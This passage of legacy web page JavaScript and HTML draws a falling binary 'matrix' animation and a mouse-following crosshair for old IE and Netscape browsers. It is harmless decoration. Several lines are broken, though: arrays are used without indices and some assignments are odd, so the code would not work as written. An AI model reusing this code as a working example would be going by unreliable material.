style='position:absolute;top:0;font-family:Arial;font-size:" +Ts+"px;left:"+S+";width:"+Ts+"px;height:0px;color:"+Tc+";visibility:hidden'></div> "); } document.write(" </div> </div> "); for(j=0; j < Cols; j++){ RC[j]=1+Math.round(Math.random()*Cl); Y[j]=0; Sp[j]=Math.round(MnS+Math.random()*MxS); for(i=0; i < RC[j]; i++){ B=''; C=Math.round(Math.random()*1)+' '; M[j]=B[0]+=C; } } function Cycle(){ Container.style.top=window.document.body.scrollTop; for (i=0; i < Cols; i++){ var r = Math.floor(Math.random()*Tcc.length); E = '<font color='+Tc1+'>'+Tcc[r]+'</font>'; Y+=Sp; if (Y > window.document.body.clientHeight){ for(i2=0; i2 < Cols; i2++){ RC[i2]=1+Math.round(Math.random()*Cl); for(i3=0; i3 < RC[i2]; i3++){ B[i3]=''; C[i3]=Math.round(Math.random()*1)+' '; C[Math.floor(Math.random()*i2)]=' '+' '; M=B[0]+=C[i3]; Y=-Ts*M.length/1.5; A.style.visibility='visible'; } Sp=Math.round(MnS+Math.random()*MxS); } } A.style.top=Y; A.innerHTML=M+' '+E+' '; } setTimeout('Cycle()',45) } Cycle(); } // --> // ]]></script> <style><!-- --></style> <div id="leftright" style="width: expression(document.body.clientWidth-2);"></div> <p class="STYLE1"><div id="topdown" style="height:expression(document.body.clientHeight-2)"></p> </div> <script type="text/javascript" language="JavaScript1.2">// <![CDATA[ if (document.all&&!window.print){ leftright.style.width=document.body.clientWidth-2 topdown.style.height=document.body.clientHeight-2 } else if (document.layers){ document.leftright.clip.width=window.innerWidth document.leftright.clip.height=1 document.topdown.clip.width=1 document.topdown.clip.height=window.innerHeight } function followmouse1(){ //move cross engine for IE 4+ leftright.style.pixelTop=document.body.scrollTop+event.clientY+1 topdown.style.pixelTop=document.body.scrollTop if (event.clientX<document.body.clientWidth-2) topdown.style.pixelLeft=document.body.scrollLeft+event.clientX+1 else topdown.style.pixelLeft=document.body.clientWidth-2 } function followmouse2(e){ //move cross engine for NS 4+ document.leftright.top=e.y+1 document.topdown.top=pageYOffset document.topdown.left=e.x+1 } if (document.all) document.onmousemove=followmouse1 else if (document.layers){ window.captureEvents(Event.MOUSEMOVE) window.onmousemove=followmouse2 } function regenerate(){ window.location.reload() } function regenerate2(){ setTimeout("window.onresize=regenerate",400) } if ((document.all&&!window.print)||document.layers) //if the user is using IE 4 or NS 4, both NOT IE 5+ window.onload=regenerate2 // ]]></script> <style><!-- --></style> <div class="helpor_net" id="i1"></div> <div class="helpor_net" id="i2"></div> <div id="i3"></div> class="helpor_net"> <div class="helpor_net" id="i4"></div> <div class="helpor_net" id="i5"></div> <div id="i6" class="helpor_net"> <div class="helpor_net" id="i7"></div> <div class="helpor_net" id="i8"></div>
